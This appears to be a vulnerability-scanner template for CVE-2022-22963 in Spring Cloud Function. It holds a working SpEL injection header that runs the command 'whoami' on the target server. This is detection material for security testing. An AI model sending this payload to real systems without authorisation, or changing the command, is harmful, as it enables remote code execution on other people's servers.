CVE-2022-22963.yaml

id: CVE-2022-22963 

info:
  name: Template Name
  author: Nicolas Krassas
  severity: critical
  description: RCE on Spring cloud function SPEL
  reference: https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
  tags: tags

requests:
- raw:
  - |-
    POST /functionRouter HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: close
    spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("whoami")
    Accept-Language: en
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 4

    test

  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - 'functionRouter'
  - type: status
    status:
    - 500